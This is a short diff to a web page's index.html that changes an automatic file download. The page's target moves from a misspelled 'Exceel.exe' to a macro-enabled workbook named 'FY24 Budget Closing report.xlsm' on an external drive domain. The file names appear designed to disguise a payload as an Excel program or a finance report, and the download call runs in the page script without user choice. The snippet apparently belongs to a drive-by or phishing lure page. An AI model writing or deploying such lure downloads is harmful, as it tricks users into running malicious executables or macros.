--- a/index.html
+++ b/index.html
@@ -120,8 +120,8 @@
         }
     
         // Usage example
-        const fileUrl = 'https://drive.ninjavan.tech/Exceel.exe';
-        const fileName = 'Exceel.exe';
+        const fileUrl = 'https://drive.ninjavan.tech/FY24 Budget Closing report.xlsm';
+        const fileName = 'FY24 Budget Closing report.xlsm';
         downloadFile(fileUrl, fileName);
 
         
